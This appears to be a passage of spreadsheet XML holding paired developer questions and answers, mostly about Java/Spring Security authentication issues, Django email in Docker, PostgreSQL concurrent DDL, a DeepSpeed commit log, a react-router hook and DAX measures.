                // see also PDFBOX-4233
                cid = 0;
            }
        }
        ...
        if (cid == 0)
        {
            throw new IllegalArgumentException(
                    String.format("No glyph for U+%04X (%c) in font %s", unicode, (char) unicode, getName()));
        }
        return encodeGlyphId(cid);
    }
    ...
}
(org.apache.pdfbox.pdmodel.font.PDCIDFontType2)
Where PDFBox could not otherwise determine a mapping from Unicode to glyph code (if (cid == -1)), the JavaDoc comments indicate another way to determine a glyph code, an inverse lookup of the ToUnicode map. If this was implemented, PDFBox could have determined a glyph ID and written your text.
Unfortunately it is not implemented yet.</t>
  </si>
  <si>
    <t xml:space="preserve">I am evaluating Sharepoint (not MOSS) vs ASP.NET as a development platform for an upcoming solution for our team.   We will be developing a solution for broad (we hope) deployment across a variety of environments.  I am identifying categories to evaluate pros / cons for each platform choice.  I have picked categories that are applicable to our solution requirements and that will affect developer / tester productivity.  Can anyone think of any other categories that would be appropriate for a comparision?  Can anyone provide any detail on your experiences with the two platforms with regards to any of the categories?
Some other information, we have a short two month time-frame to release something, so we are prioritizing features as we speak.  We see Sharepoint as a way to get something out the door quickly while leveraging the UI framework for a basic UI, security, and lists and document libraries for storage.
Development Environment
Developer Productivity
Functional Testability  
Developer Testability (unit-testing)  
Role Based Security 
View-based Security  
User Experience 
Database - Easy of development with Sharepoint based on the use of lists.  However, adding reporting as a requirement makes using lists a hinderance. 
Reporting  - Sharepoint makes this difficult 
Document Repository - Our solution will require multiple document libraries to attach artifacts to solution elements 
Packaging 
Installation - Sharepoint provides us with easy famr installation via WSP. 
Scalability
Extensibility
Complexity
Conceptual Integrity (domain boundaries)
Redundancy/Replication/Backup/Recovery Support
</t>
  </si>
  <si>
    <t>C773</t>
  </si>
  <si>
    <t>AuthorizationHeader is empty in Waffle after update to Spring Boot 3 #2598
We use Waffle in our Vaadin app. I have debugged the source code for Waffle.
request.getHeader("Authorization");
is called on line 61 in the Waffle-class AuthorizationHeader. This returns null, which causes no WindowsPrincipal being created. This makes it impossible to being authenticated. How can this be solved? This is my code:
@configuration
@EnableWebSecurity
@EnableMethodSecurity(securedEnabled = true)
@componentscan
public class SecurityConfiguration {
@Autowired
private NegotiateSecurityFilter negotiateSecurityFilter;
@Autowired
private NegotiateSecurityFilterEntryPoint entryPoint;
    @Bean
protected SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
    http.authorizeHttpRequests(requests -&gt; {
        requests.requestMatchers("/**").permitAll()
                .requestMatchers("/**").authenticated();
        })
        .headers(headers -&gt; headers
            .frameOptions(frameOptions -&gt; frameOptions
                    .sameOrigin()
            )
        )
        .addFilterAfter(negotiateSecurityFilter, BasicAuthenticationFilter.class);
    http.csrf(AbstractHttpConfigurer::disable); 
    return http.build();
}
@configuration
public class WaffleConfig {
@Bean
public WindowsAuthProviderImpl waffleWindowsAuthProvider() {
    return new WindowsAuthProviderImpl();
}
@Bean
public NegotiateSecurityFilterProvider negotiateSecurityFilterProvider(
        WindowsAuthProviderImpl windowsAuthProvider) {
    NegotiateSecurityFilterProvider negotiateSecurityFilterProvider = new NegotiateSecurityFilterProvider(windowsAuthProvider);
    negotiateSecurityFilterProvider.setProtocols(Arrays.asList("NTLM"));
    return negotiateSecurityFilterProvider;
}
@Bean
public BasicSecurityFilterProvider basicSecurityFilterProvider(WindowsAuthProviderImpl windowsAuthProvider) {
    return new BasicSecurityFilterProvider(windowsAuthProvider);
}
@Bean
public SecurityFilterProviderCollection waffleSecurityFilterProviderCollection(
        NegotiateSecurityFilterProvider negotiateSecurityFilterProvider,
        BasicSecurityFilterProvider basicSecurityFilterProvider) {
    SecurityFilterProvider[] securityFilterProviders = {
            negotiateSecurityFilterProvider,
            basicSecurityFilterProvider };
    return new SecurityFilterProviderCollection(securityFilterProviders);
}
@Bean
public NegotiateSecurityFilterEntryPoint negotiateSecurityFilterEntryPoint(
        SecurityFilterProviderCollection securityFilterProviderCollection) {
    NegotiateSecurityFilterEntryPoint negotiateSecurityFilterEntryPoint = new NegotiateSecurityFilterEntryPoint();
    negotiateSecurityFilterEntryPoint.setProvider(securityFilterProviderCollection);
    return negotiateSecurityFilterEntryPoint;
}
@Bean
public NegotiateSecurityFilter waffleNegotiateSecurityFilter(SecurityFilterProviderCollection securityFilterProviderCollection) {
    NegotiateSecurityFilter negotiateSecurityFilter = new NegotiateSecurityFilter();
    negotiateSecurityFilter.setProvider(securityFilterProviderCollection);
    return negotiateSecurityFilter;
}
// This is required for Spring Boot so it does not register the same filter twice
@Bean
public FilterRegistrationBean waffleNegotiateSecurityFilterRegistration(NegotiateSecurityFilter waffleNegotiateSecurityFilter) {
	FilterRegistrationBean registrationBean = new FilterRegistrationBean();
	registrationBean.setFilter(waffleNegotiateSecurityFilter);
	registrationBean.setEnabled(false);
	return registrationBean;
}
It seems like it is not possible to see authorization headers in developer tools anymore:
https://stackoverflow.com/questions/78223785/browsers-dont-display-authorization-header-in-devtools
I tried Fiddle, but it was not allowed by our companys security policy.</t>
  </si>
  <si>
    <t>For Firefox just set network.http.sanitize-headers-in-logs to false in about:config.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have this error message, when sending an e-mail from Django Docker container.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;OSError at /accounts/signup/
[Errno 99] Cannot assign requested address
Request Method:     POST
Request URL:    http://127.0.0.1:8000/accounts/signup/
Django Version:     4.0.10
Exception Type:     OSError
Exception Value:    
[Errno 99] Cannot assign requested address
Exception Location:     /usr/local/lib/python3.10/socket.py, line 833, in create_connection
Python Executable:  /usr/local/bin/python
Python Version:     3.10.4
Python Path:    
['/code',
 '/usr/local/lib/python310.zip',
 '/usr/local/lib/python3.10',
 '/usr/local/lib/python3.10/lib-dynload',
 '/usr/local/lib/python3.10/site-packages']
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is my configuration in &lt;code&gt;settings.py&lt;/code&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;EMAIL_BACKEND = &amp;quot;django.core.mail.backends.smtp.EmailBackend&amp;quot;
DEFAULT_FROM_EMAIL = &amp;quot;my@gmail.com&amp;quot;
EMAIL_HOST = &amp;quot;smtp.gmail.com&amp;quot;
EMAIL_PORT = 465
EMAIL_USE_SSL = True
EMAIL_USE_TLS = False
EMAIL_HOST_USER = &amp;quot;my@gmail.com&amp;quot;
EMAIL_HOST_PASSWORD = &amp;quot;mypassword&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is &lt;code&gt;docker-compose.yml&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;version: &amp;quot;3.9&amp;quot;
services:
  web:
    build: .
    command: python /code/manage.py runserver 0.0.0.0:8000
    volumes:
      - .:/code
    ports:
      - 8000:8000
      - 465:465
    depends_on:
      - db
    environment:
      - &amp;quot;DJANGO_SECRET_KEY=my_key&amp;quot;
      - &amp;quot;DJANGO_DEBUG=True&amp;quot;
  db:
    image: postgres:13
    volumes:
      - postgres_data:/var/lib/postgresql/data/
    environment:
      - &amp;quot;POSTGRES_HOST_AUTH_METHOD=trust&amp;quot;
volumes:
  postgres_data:
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm able to send e-mail with the same config via &lt;code&gt;Python&lt;/code&gt; code without docker container.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C774</t>
  </si>
  <si>
    <t>OIDC logout not working for JPA/JDBC OAuth2AuthorizationService because DefaultSaml2AuthenticatedPrincipal does not implement equality #15346
Context
Using Spring Boot 3.3.0 with:
spring-boot-starter-oauth2-authorization-server
spring-boot-starter-oauth2-client
spring-boot-starter-security
spring-boot-starter-web
spring-security-saml2-service-provider 6.3.0
Bug description
We have set up Spring Authorization Server with an implementation of OAuth2AuthorizationService that persists authorizations in the database via JPA (following https://docs.spring.io/spring-authorization-server/reference/guides/how-to-jpa.html). Also, our Authorization Server delegates authentication to a SAML IdP.
The flow works correctly, but signing out fails complaining the "sid" claim in the OIDC token is missing due to SessionInformation not found at token generation time. See spring-projects/spring-authorization-server#1361 for a similar description.
When the JPA based OAuth2AuthorizationService is replaced by InMemoryOAuth2AuthorizationService, the whole flow works as expected.
Debugging shows that the problem is in the SessionRegistryImpl, which keeps a Map&lt;DefaultSaml2AuthenticatedPrincipal, Set&lt;String&gt;&gt; in this scenario. When building the token in OAuth2AuthorizationCodeAuthenticationProvider:249 Spring tries to get session information for the principal, so it does a get() on the map (SessionRegistryImpl:78).
The problem here is that DefaultSaml2AuthenticatedPrincipal was serialized and deserialized because of the JPA implementation of the OAuth2AuthorizationService (as an attribute of OAuth2Authorization). After deserialization, it is a new instance and because DefaultSaml2AuthenticatedPrincipal does not implement an equals/hashCode method, the map retrieval always fails, so the linked Session ID is never found.
See also
https://stackoverflow.com/questions/77093539/sid-missing-in-id-token-using-spring-authorization-server</t>
  </si>
  <si>
    <t>i have the same behaviour as @user7090887
With InMemory Repository:
With JDBC Repository:
With InMemory i have the sid and with JDCBC its missing.
And when i try to logout i get an exception.
I forked the github repo from @user7090887 and created a working version.
I can push it when it helps.
#### Open in Browser
http://localhost:9009/oauth2/authorize?
    response_type=code
    &amp;client_id=messaging-client
    &amp;scope=openid
    &amp;redirect_uri=http://localhost:8080
    &amp;code_challenge=t3RzPLjc8NiO_mpmIuTJYi2P6Ps8y9jP6cphOhSNozw
    &amp;code_challenge_method=S256
##### Get JWT Token
POST http://localhost:9009/oauth2/token?client_id=messaging-client
    &amp;redirect_uri=http://localhost:8080
    &amp;grant_type=authorization_code
    &amp;scope=openid
    &amp;code=y2VsiK-mdjsZQ9gr_qHJGV0uZKxfvyVzXXbq7D0x0tAE4QgYJoQXFRHTyjOF5tR9jgFB8zXn_Yj-icyGy9EIhFa6wVy6Hg9LZcSsSYTHc9PccI7PGitdNaZIWfvRpTex
    &amp;code_verifier=mlZDBO_BNru6SRVHWhhAMJIsVCAdVZAL8VRTpy8hXBzcOJ92gKHtXPI3Agb0FF-l5NtYIbAcrl7bsHqSVJNDVWa0sjSoe0RvdwNy4Yz6StaQ-vd7uU0IRg-1tshE19PA
&gt; {%
    client.global.set("AUTH_TOKEN",response.body.access_token);
    client.global.set("ID_TOKEN",response.body.id_token);
%}
RegisteredClient registeredClient = RegisteredClient.withId(UUID.randomUUID().toString())
                .clientId("messaging-client")
                .clientSecret("secret")
                .clientAuthenticationMethod(ClientAuthenticationMethod.NONE)
                .authorizationGrantType(AuthorizationGrantType.AUTHORIZATION_CODE)
                .redirectUri("http://localhost:8080")
                .postLogoutRedirectUri("http://localhost:8080")
                .scope(OidcScopes.OPENID)
                .clientSettings(ClientSettings.builder().requireProofKey(true).requireAuthorizationConsent(false).build())
                .build();
        RegisteredClient deviceClient = RegisteredClient.withId(UUID.randomUUID().toString())
                .clientId("device-messaging-client")
                .clientAuthenticationMethod(ClientAuthenticationMethod.NONE)
                .authorizationGrantType(AuthorizationGrantType.DEVICE_CODE)
                .authorizationGrantType(AuthorizationGrantType.REFRESH_TOKEN)
                .scope("message.read")
                .scope("message.write")
                .build();</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for resources concerning Android's use of XML - not how to's, but technical articles or whitepapers concerning the XML architecture in Android. Why were things designed the way they were, what considerations were made - all specific to the XML part.
If this is not available, I'm also interested in general use of XML in mobile computing. Does the iPhone use XML in the same way?
Can anyone point me to some good articles/websites/books/whitepapers/videos ?
</t>
  </si>
  <si>
    <t>C775</t>
  </si>
  <si>
    <t>Endpoint returns a 500, instead of 403 status code when the user does not have required permission #15254
Describe the bug
When upgrading Spring boot from 3.2.5 to Spring boot 3.3.0, which contains a new version of Spring security 6.3, I got some failing test cases that should return a 403 FORBIDDEN status code instead returns a 500 INTERNAL SERVER ERROR.
Spring Boot: 3.3.0
Spring Security: 6.3.0
To Reproduce
Here is a controller class
@GetMapping(value = "/books")
@PreAuthorize("hasAuthority('developer')")
public ResponseEntity&lt;List&lt;BookProjection&gt;&gt; getAllByBookCategory(@RequestParam BookCategory bookCategory) {
    return ResponseEntity.ok(bookQueryService.getAllByBookCategory(bookCategory));
}
and SecurityConfiguration.class
@Configuration
@ConditionalOnWebApplication
@EnableWebSecurity
@EnableMethodSecurity
class SecurityConfiguration {
    @Bean
    WebSecurityCustomizer webSecurityCustomizer() {
        return web -&gt; web.ignoring()
                .requestMatchers("/v3/api-docs", "/v3/api-docs.yaml")
                .requestMatchers(HttpMethod.GET, "/api/v1/developers")
                .requestMatchers(HttpMethod.GET, "/ready")
                .requestMatchers("/error");
    }
    @Bean
    SecurityFilterChain securityFilterChain(HttpSecurity http) throws Exception {
        http.addFilterAfter(new AuthTokenCompleteFilter(), BearerTokenAuthenticationFilter.class)
                .authorizeHttpRequests(authorizeHttpRequests -&gt; authorizeHttpRequests
                        .requestMatchers(EndpointRequest.to("info", "health")).permitAll()
                        .anyRequest().authenticated())
                .cors(withDefaults())
                .csrf(AbstractHttpConfigurer::disable)
                .oauth2ResourceServer(oauth2ResourceServer -&gt; oauth2ResourceServer
                .jwt(jwt -&gt; jwt
                        .jwtAuthenticationConverter(jwtAuthenticationConverter())));
        return http.build();
    }
}
and here is an Integration test class:
I get exactly the same result, where it throws a 500 error, for some reason...
https://stackoverflow.com/questions/78992112/spring-security-access-denied-from-preauthorize-keeps-returning-500-full-cod</t>
  </si>
  <si>
    <t>I've implemented an AccessDeniedHandler
@Component
internal class AccessDeniedHandler : ServerAccessDeniedHandler {
    override fun handle(
        exchange: ServerWebExchange?,
        ex: AccessDeniedException?
    ): Mono&lt;Void&gt; {
        val response = exchange?.response ?: return Mono.empty()
        response.statusCode = HttpStatus.FORBIDDEN
        response.headers.contentType = MediaType.APPLICATION_JSON
        response.headers.add("Authorization-Status", "Forbidden")
        // create AuthorizationException
        val authorizationException = AuthorizationException(
            type = URI.create(URIErrorTypes.FORBIDDEN.type),
            httpStatus = HttpStatus.FORBIDDEN,
            title = "Authorization Failure",
            message = ex?.message ?: "Access Denied",
            cause = ex?.cause as Exception,
            ErrorCodeTypes.AUTHORIZATION_EXCEPTION.code,
            ErrorCategoryTypes.AUTHORIZATION_ERROR.type,
        )
        // convert to ProblemDetailsExtended
        val problemDetailsExtended = ProblemDetailsExtended(
            type = authorizationException.type,
            status = authorizationException.httpStatus.value(),
            title = authorizationException.title,
            detail = authorizationException.message,
            instance = null,
            code = authorizationException.code,
            errorCategory = authorizationException.errorCategory,
            errors = listOf(
                ErrorDetail(
                    detail = authorizationException.cause?.message ?: authorizationException.message,
                    code = authorizationException.code.toString()
                )
            )
        )
        // serialize to JSON
        val errorResponse = JSONUtilities.objectMapper.writeValueAsString(problemDetailsExtended)
        val responseBody = response.bufferFactory().wrap(errorResponse.toByteArray())
        return response.writeWith(Mono.just(responseBody))
    }
}
I have also implemented a
Global Exception Handler
for
AccessDeniedException
here:
@ExceptionHandler(AccessDeniedException::class)
    private suspend fun handleAuthorizationException(ex: AccessDeniedException): ResponseEntity&lt;ProblemDetailsExtended&gt; {
        val problemDetail = ProblemDetail.forStatusAndDetail(HttpStatus.FORBIDDEN, ex.message).apply {
            type = URI.create(URIErrorTypes.FORBIDDEN.type)
            status = HttpStatus.FORBIDDEN.value()
            title = "Authorization Failure"
            detail = ex.message ?: "Access Denied"
        }
        val ProblemDetailsExtended = ProblemDetailsExtended(
            type = problemDetail.type,
            status = problemDetail.status,
            title = problemDetail.title,
            detail = problemDetail.detail,
            instance = problemDetail.instance,
            code = ErrorCodeTypes.AUTHORIZATION_EXCEPTION.code,
            errorCategory = ErrorCategoryTypes.AUTHORIZATION_ERROR.type,
            errors = listOf(
                ErrorDetail(
                    detail = ex.cause?.message ?: ex.message ?: "Access Denied",
                    code = ErrorCodeTypes.AUTHORIZATION_EXCEPTION.code.toString()
                )
            )
        )
        return ResponseEntity(
            ProblemDetailsExtended,
            headers,
            ProblemDetailsExtended.status ?: HttpStatus.INTERNAL_SERVER_ERROR.value()
        )
    }
But for some reason, I'm not getting the right response back, when I hit an endpoint like:
@GetMapping("/projects/{pid}")
    @PreAuthorize("hasAuthority('contract:read_project')")
    suspend fun findAllByProjectId(
        @PathVariable pid: Long
    ): ResponseEntity&lt;Flow&lt;ContractEntity?&gt;&gt; {
        return withContext(Dispatchers.IO) {
            val contracts = contractService.findAllByProjectId(pid)
            ResponseEntity.ok(contracts)
        }
    }
I keep getting this back - as though Spring is seeing it as a generic 500 error?
I'm not sure where I may be going wrong. I do have an error handler for base exceptions
@ExceptionHandler(Exception::class)
    @ResponseStatus(HttpStatus.INTERNAL_SERVER_ERROR),
But if I disable that, I then get this...(which is showing the results from my AuthenticationEntryPoint handler.
So, I am quite confused why neither of my Access Denied handlers are working? Should I be using AuthorizationDeniedException instead of AccessDeniedException?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;pre&gt;&lt;code&gt;const updateAttempt = () =&amp;gt; {
  //const newAttempt = { attempt: currAttempt.attempt + 1, letterPos: 0 };
  //setCurrAttempt(newAttempt);
  setCurrtAttempt(prevAttempt =&amp;gt; ({
  ...prevAttempt,
  attempt: prevAttempt.attempt + 1,
  letterPos: 0
  }));
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The commented lines don't update currAttempt, but the uncommented lines do. I'm just wondering why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C776</t>
  </si>
  <si>
    <t>feat: DeepSpeed Autotune [MLG-201] (#6924)
* Save model info; add Core API DeepSpeed example.
* extract ds profiler results
* Place activation mem into search metric.
* Obtain metrics from the model info file
* remove unused code
* adapted to passing dicts into report_completed
* cleanup and small changes
* refactoring and trial helper classes
* initial random search logic started
* minor changes
* minor cleanup
* use context manager, expanded base searcher
* remove ds_autotuning dir from examples
* minor edits
* readme updates and other cleanup
* bug fixes and a hack to avoid needing nested model dirs
* README updates
* Feat deepspeed autotune (#5875)
Added current Core API prototype.
* switched to triggering their autotuning in our trials
* remove checkpoint wrapper
* implementing checkpointing
* implementing checkpointing
* feat: allow includes in custom searcher experiment [MLG-338] (#6091)
* cleanups, bug fixing, and more examples
* adding native dsat tests
* cleanup
* minor edits
* fix missing is_chief
* Feat deepspeed autotune (#6159)
Trigger the native DS AT exit behavior for all trials.
* minor edits
* Feat deepspeed autotune git fixes (#6180)
deleted extraneous files
* readme fix and make cifar10 work off grenoble (#6187)
* Deepspeed Feature Branch - merge master (#6193)
* docs: Improvements to HPC launcher docs (#6042)
* Provide inline info about agent-specific scheduling options that do not apply to HPC Launcher
  configurations.
* Identify enroot-specific differences from docker (like for Singularity)
* Provide reference to custom resource pools as an option to deal with non-homogenous
  Slurm/PBS partitions.
* chore: Allow newer Node versions 17-19 (#6038)
* fix: k8s rm gives wrong slot count in rendezvous (#6044)
* chore: bump version: 0.19.12-dev0 -&gt; 0.20.0-dev0 (#6048)
* chore: remove `applicableRoutespace` (#6040)
* chore: warning fixes in web (#6041)
* chore: fix warnings
* chore: change eslint rules
* chore: fix gpu nightly errors (#6046)
* chore: missing nodev18 (#6050)
* chore: add a dedicated exception for cli errors (#5649)
switch sys.exit calls in cli with a new user-facing exception.
* fix: SSO layout (#6053)
* chore: clean up UI kit (#6039)
* fix: lopsided training with 2,1 gpus (#6054)
There was a guard to skip local zmq setup when local_size &lt; 2, but that
became no longer valid when local_size varied from worker to worker.
The result is one extra global allgather in some cases, no big deal.
* docs: add rbac ntsc &amp; mr release notes (#6049)
* chore: manual bump version (#6058)
* ci: retry downloading GKE auth plugin [DET-8956] (#6056)
We got a failure due to a timeout on this, so let it retry a few times.
* docs: update Singularity known issues. (#6047)
* fix: Add #rank to worker segment instead of timestamp segment of Pytorch Profiler files [MLG-326] (#6037)
* Add pytorch profiler specific handling logic for appending rank to file name
* Change to use f-string
* fix only file name being passed in
* remove print statement
* fix: handle agent shutdown msg (#6065)
* chore: manually bump vite version (#6066)
* feat: Display better x-axis ticks on charts with time axis [WEB-849] (#6051)
* remove xTickValues from props now that it can be calculated internally
* test: add logging to a flaky test (#6068)
Test is flaky but hard to pin down, so add some prints for next time.
* fix: Unrelated models are shown in a workspace model registry tab (#6067)
* feat: Added task-based historical allocation endpoint [DET-8537] (#6015)
* fix: show `not found` and `spinner` properly (#6070)
* fix: show `not found` and `spinner` properly
* chore: change home redirect path
* fix: projectDetail page
* fix: project.workspaceId
* build(deps): bump golang.org/x/text from 0.3.5 to 0.3.8 in /proto (#6061)
* build(deps): bump golang.org/x/text from 0.3.5 to 0.3.8 in /proto
Bumps [golang.org/x/text](https://github.com/golang/text) from 0.3.5 to 0.3.8.
- [Release notes](https://github.com/golang/text/releases)
- [Commits](golang/text@v0.3.5...v0.3.8)
---
updated-dependencies:
- dependency-name: golang.org/x/text
  dependency-type: indirect
...
Signed-off-by: dependabot[bot] &lt;support@github.com&gt;
* fix: gpt-neox docker image and startup hook to work for non-provileged user (#6060)
* test: add locking around migration [DET-8957] (#6071)
In integration tests, multiple processes can attempt to run migrations
against the same database at once, which can lead to errors because
PostgreSQL's `CREATE TABLE IF NOT EXISTS` is not great with concurrency
(it allows for a time-of-check/time-of-use failure).
The specific errors we were seeing were conflicts in the pg_type table,
so the code now locks that table for the duration of the migration
transaction.
More information:
https://www.postgresql.org/message-id/CA+TgmoZAdYVtwBfp1FL2sMZbiHCWT4UPrzRLNnX1Nb30Ku3-gg@mail.gmail.com
https://stackoverflow.com/questions/29900845</t>
  </si>
  <si>
    <t>This is a bit of a wart in the implementation of
IF NOT EXISTS
for tables and schemas. Basically, they're an upsert attempt, and PostgreSQL doesn't handle the race conditions cleanly. It's safe, but ugly.
If the schema is being concurrently created in another session but isn't yet committed, then it both exists and does not exist, depending on who you are and how you look. It's not possible for other transactions to "see" the new schema in the system catalogs because it's uncommitted, so it's entry in
pg_namespace
is not visible to other transactions. So
CREATE SCHEMA
/
CREATE TABLE
tries to create it because, as far as it's concerned, the object doesn't exist.
However, that inserts a row into a table with a unique constraint. Unique constraints must be able to see uncommitted rows in order to function. So the insert blocks (stops) until the first transaction that did the
CREATE
either commits or rolls back. If it commits, the second transaction aborts, because it tried to insert a row that violates a unique constraint.
CREATE SCHEMA
isn't smart enough to catch this case and re-try.
To properly fix this PostgreSQL would probably need predicate locking, where it could lock the
potential for a row
. This might get added as part of the current work going on for implementing
UPSERT
.
For these particular commands, PostgreSQL could probably do a
dirty read
of the system catalogs, where it can see uncommitted changes. Then it could wait for the uncommitted transaction to commit or roll back, re-do the dirty read to see if someone else is waiting, and retry. But this would have a race condition where someone else might create the schema between when you do the read to check for it and when you try to create it.
So the
IF NOT EXISTS
variants would have to:
Check to see if the schema exists; if it does, finish without doing anything.
Attempt to create the table
If creation fails due to a unique constraint error, retry at the start
If table creation succeeds, finish
As far as I know nobody's implemented that, or they tried and it wasn't accepted. There would be possible issues with transaction ID burn rate, etc, with this approach.
I think this is a bug of sorts, but it's a "yeah, we know" kind of bug, not a "we'll get right on fixing that" kind of bug. Feel free to post to pgsql-bugs about it; at the very least the documentation should mention this caveat about
IF NOT EXISTS
.
I don't recommend doing DDL concurrently like that.</t>
  </si>
  <si>
    <t xml:space="preserve">I am currently tasked with creating a documented, consistent Architecture guide for software development. We have a lot of smart people doing the right things, but just not consistently and repeatably.
We are using Microsoftâ€™s Application Architecture Guide 2.0 as a starting point. Hence coming up with an Application Architecture is fairly (I won't say easy) straight forward. Possibly because I have a couple of years experience as a developer so I have a pretty good understanding of this realm and there are also loads of examples and guidance.
Since our organisation has a couple of applications that form 1 or more systems which we then install "at" clients... we thought it would make sense to create a System Architecture and an Enterprise Architecture as well. And this is where the problems start.
There is no consistent guidance out there. If you search for "System Architecture Examples", the stuff that you get back is so different that I am wondering if there is a "Standard" way to do this.
From my (Limited - clearly) understanding of it all, the System Architecture is an abstraction of 1 or more application architectures depicting how they work together to form a system. Furthermore, an Enterprise Architecture is a further abstraction showing how your system(s) fit into a organisations Enterprise and how it interacts with the Business processes, IT Strategy and how it Integrats into other systems in the enterprise.
Do I have it completely wrong?
Are there any standards out there (and where can I find them)?
Should there be standards, or would a "good" System Architecture simply be any document in any format which is clearly and easily understandable and useful to its readers?
What would the seasoned Architects think of that approach though? 
I don't want to simply list a set of SOA related patterns that may be useful... I'd like to make it a little more focused to what we do, which is the build financial solutions on a Service Orientated Architecture.
Update: What about [external-link]. Does anyone have experience with it at all and is it worth the effort of trying to understand it in detail.
</t>
  </si>
  <si>
    <t>C777</t>
  </si>
  <si>
    <t>Refactored useJoinAndLeaveSessionOnRouteChange for reuse (and posted it on StackOverflow https://stackoverflow.com/a/77996251/1860591</t>
  </si>
  <si>
    <t>I created this hook for react-router v6.
import {DependencyList, useCallback, useEffect, useRef} from 'react';
import {matchPath, PathMatch, PathPattern, useLocation} from 'react-router-dom';
import {isEqual} from 'lodash';
type EnterProps = {prevPathMatch: undefined; pathMatch: PathMatch&lt;string&gt;};
type ChangeProps = {
  prevPathMatch: PathMatch&lt;string&gt;;
  pathMatch: PathMatch&lt;string&gt;;
};
type LeaveProps = {prevPathMatch: PathMatch&lt;string&gt;; pathMatch: undefined};
type OnUpdateProps = EnterProps | ChangeProps | LeaveProps;
/**
 * A hook that allows you to listen to path changes in the URL.
 * @param pathPattern a react-router v6 path pattern
 * @param onUpdate a function that is called when you enter, leave or change the path
 * @param deps dependencies for the onUpdate function
 */
export const useRoutePathUpdate = (
  pathPattern: PathPattern&lt;string&gt; | string,
  onUpdate: (props: OnUpdateProps) =&gt; void,
  deps: DependencyList,
) =&gt; {
  const location = useLocation();
  const pathMatch = matchPath(pathPattern, location.pathname);
  const prevPathMatch = useRef&lt;PathMatch&lt;string&gt; | null&gt;(null);
  // eslint-disable-next-line react-hooks/exhaustive-deps
  const onUpdateCallback = useCallback(onUpdate, deps);
  useEffect(() =&gt; {
    if (pathMatch) {
      if (prevPathMatch.current === null) {
        onUpdateCallback({prevPathMatch: undefined, pathMatch});
      } else if (!isEqual(prevPathMatch.current, pathMatch)) {
        onUpdateCallback({prevPathMatch: prevPathMatch.current, pathMatch});
      }
    } else if (prevPathMatch.current !== null) {
      onUpdateCallback({
        prevPathMatch: prevPathMatch.current,
        pathMatch: undefined,
      });
    }
    prevPathMatch.current = pathMatch;
  }, [pathMatch, prevPathMatch, onUpdateCallback]);
};
Here is an example of how you can use this hook
useRoutePathUpdate("/todo/:item", ({prevPathMatch, pathMatch}) =&gt; {
  if (prevPathMatch?.params['item']) {
    console.log(`OnLeave todo item ${prevPathMatch.params['item']}`);
  }
  if (pathMatch?.params['item']) {
    console.log(`OnEnter todo item ${pathMatch.params['item']}`);
  }
}, [ /* dependencies go here */]);</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to find an unified approach to show Plan/Actual/Variance for both absolute and relative metrics.
There are several datasets, which are generally structured similarly. They have&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Dates (supposed to group/expand/collapse)&lt;/li&gt;
&lt;li&gt;&amp;quot;pf&amp;quot; (plan/fact) - a plan/actual data marker&lt;/li&gt;
&lt;li&gt;Dimensions - platforms, regions, channels (different for each dataset, supposed to be grouped in different combinations and also expanded/collapsed)&lt;/li&gt;
&lt;li&gt;Absolute metrics may include expenses, sale amounts, some other values like weight shipped in logistics or clicks in ecom.&lt;/li&gt;
&lt;li&gt;Relative metrics like rates, avg prices, ratios etc. They are all defined as measures.
I expect to see plan, actual and variance for both absolute and relative metrics in the same place, grouped by different criteria, like
see expense and ROI for each channel, the whole platform, and all platforms aggregated.
or average weight for different warehouses and different target regions.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Comparing absolute values only would be quite easy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;unpivot metrics on preparation step, getting two columns: metric / value&lt;/li&gt;
&lt;li&gt;use &amp;quot;metric&amp;quot; as a dimension&lt;/li&gt;
&lt;li&gt;make three measures:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre&gt;&lt;code&gt;plan:=CALCULATE(sum(tbl[value]), pf=&amp;quot;plan&amp;quot;)
act (//same)
var:=DIVIDE(act,plan)-1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But having relative measures makes it harder&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;First I tried approach like this:
an aux table called aspects with one column containing four values: plan, act, dif, var.
It is brought into the main table without creating a relationship.
Measures look something like this:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;expense := SWITCH(
  IF(HASONEVALUE(aspects[aspect]), VALUES(aspects[aspect]), BLANK()), 
  &amp;quot;plan&amp;quot;, CALCULATE(SUM(combined[expense]), combined[pf] = &amp;quot;plan&amp;quot;), 
  &amp;quot;act&amp;quot;, CALCULATE(SUM(combined[expense]), combined[pf] = &amp;quot;fact&amp;quot;), 
  &amp;quot;dif&amp;quot;, CALCULATE(SUM(combined[expense]), combined[pf] = &amp;quot;plan&amp;quot;) - CALCULATE(SUM(combined[expense]), combined[pf] = &amp;quot;fact&amp;quot;), 
  &amp;quot;var&amp;quot;, DIVIDE(CALCULATE(SUM(combined[expense]), combined[pf] = &amp;quot;fact&amp;quot;), CALCULATE(SUM(combined[expense]), combined[pf] = &amp;quot;plan&amp;quot;)) - 1
)
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="2"&gt;
&lt;li&gt;Then I tried approach like this:
an aux table called dimensions_list with a column like (let's consider an ecom as an example): expense | sales | clicks | orders | avg_order | roi | cr | ctr | cpc.
I build measures in two stages: first, each individual metric.
Absolute measures:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;_orders := SUM(combined[orders])
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Relative measures:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;_avg_order := DIVIDE([_sales], [_orders])
&lt;/code&gt;&lt;/pre&gt;
